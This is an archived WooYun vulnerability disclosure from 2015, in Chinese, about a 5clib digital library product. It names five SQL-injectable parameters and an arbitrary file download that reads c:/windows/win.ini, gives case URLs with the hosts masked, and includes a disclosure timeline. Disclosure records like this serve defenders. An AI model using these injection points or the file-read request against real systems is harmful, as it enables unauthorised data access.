乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-25: 细节已通知厂商并且等待厂商处理中 2015-07-27: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-07-30: 细节向第三方安全合作伙伴开放 2015-09-20: 细节向核心白帽子及相关领域专家公开 2015-09-30: 细节向普通白帽子公开 2015-10-10: 细节向实习白帽子公开 2015-10-25: 细节向公众公开
root权限
五车信息技术(北京)有限公司一直致力于数字出版领域应用,提供相关产品技术和服务。五车公司掌握的数字 出版核心技术与国际同步,可提供服务主导型模式(SOA)完全解决方 案,实现传统出版物数字化、商用数字内容、互联网文献信息资源的无缝集成,具有全球竞争力。SQL Injection:
SQL1:/5clib/bookWeb.action?formAction=bookBrief&pid=???&ccode=** pid参数存在注入SQL2:/5clib/ebooksearch.action 或者:/ebook/search.jsp POST: select=all&keyword= keyword参数存在注入 SQL3:/5clib/paperWeb.action?formAction=paperDetail&Id=??? Id参数存在注入SQL4:/5clib/paperWeb.action?formAction=paperClass&mark=001&classname=??&grade=1 classname存在注入 formaction作用也不一样SQL5:/5clib/newsWebManage.action?formAction=newsDetail&Id=8 Id参数存在注入任意文件下载:/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini
Case:
第一处案例:**.**.**.**:8081/5clib/bookWeb.action?formAction=bookBrief&pid=YsdsdebY000b3fa7Y**.**.**.**:8081/5clib/bookWeb.action?formAction=bookBrief&pid=YsdsdebY0011c9a4Y&ccode=009003http://**.**.**.**:8081/5clib/bookWeb.action?formAction=bookBrief&pid=YsdsdebY0008d874Y&ccode=001004006002http://**.**.**.**:8081/bookWeb.action?formAction=bookBrief&pid=YsdsdebY0008d42cY&ccode=017016003001009**.**.**.**:8081/5clib/bookWeb.action?formAction=bookBrief&pid=YsdsdebY0004c8ceY&ccode=017016第二处案例:**.**.**.**:8081/5clib/ebooksearch.action**.**.**.**:8081/5clib/ebooksearch.actionhttp://**.**.**.**:8081/5clib/ebooksearch.actionhttp://**.**.**.**:8081/5clib/ebooksearch.action**.**.**.**:8081/5clib/ebooksearch.action第三处案例:**.**.**.**:8081/5clib/paperWeb.action?formAction=paperDetail&Id=121384475476591567839023666490http://**.**.**.**:8081/5clib/paperWeb.action?formAction=paperDetail&Id=121384475476591567839023666490**.**.**.**:8081/5clib/paperWeb.action?formAction=paperDetail&Id=121384493826536128697335600976http://**.**.**.**:8081/paperWeb.action?formAction=paperDetail&Id=122170606864184234595307531536**.**.**.**:8081/5clib/paperWeb.action?formAction=paperDetail&Id=121384475476591567839023666490第四处案例:http://**.**.**.**:8081/5clib/paperWeb.action?formAction=paperClass&mark=001&classname=%E6%B3%95%E5%BE%8B%E4%B8%93%E4%B8%9A%E8%AE%BA%E6%96%87&grade=1**.**.**.**:8081/5clib/paperWeb.action?formAction=paperClass&mark=002&classname=3&grade=1**.**.**.**:8081/5clib/paperWeb.action?formAction=paperClass&mark=003&classname=4&grade=1**.**.**.**:8081/5clib/paperWeb.action?formAction=paperClass&mark=root&classname=10&grade=1http://**.**.**.**:8081/paperWeb.action?formAction=paperClass&mark=006&classname=7&grade=1第五处案例:http://**.**.**.**:8081/5clib/newsWebManage.action?formAction=newsDetail&Id=8**.**.**.**:8081/5clib/newsWebManage.action?formAction=newsDetail&Id=1http://**.**.**.**:8081/newsWebManage.action?formAction=newsDetail&Id=3http://**.**.**.**:81/newsWebManage.action?formAction=newsDetail&Id=8**.**.**.**:8081/5clib/newsWebManage.action?formAction=newsDetail&Id=2第六处案例:**.**.**.**:8081/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini**.**.**.**:8081/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.inihttp://**.**.**.**:8081/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.inihttp://**.**.**.**:8081/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini**.**.**.**:8081/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini
第一处证明:/5clib/bookWeb.action?formAction=bookBrief&pid=???&ccode=** 第二处证明:/5clib/ebooksearch.action POST: select=all&keyword= 第三处证明:/5clib/paperWeb.action?formAction=paperDetail&Id=??? 第四处证明:/5clib/paperWeb.action?formAction=paperClass&mark=001&classname=??&grade=1 第五处证明:/5clib/newsWebManage.action?formAction=newsDetail&Id=8 第六处证明:/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.in
第二处证明:/5clib/ebooksearch.action POST: select=all&keyword=
第三处证明:/5clib/paperWeb.action?formAction=paperDetail&Id=???
第四处证明:/5clib/paperWeb.action?formAction=paperClass&mark=001&classname=??&grade=1
第五处证明:/5clib/newsWebManage.action?formAction=newsDetail&Id=8
第六处证明:/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.in
危害等级:高
漏洞Rank:13
确认时间:2015-07-27 20:52
暂无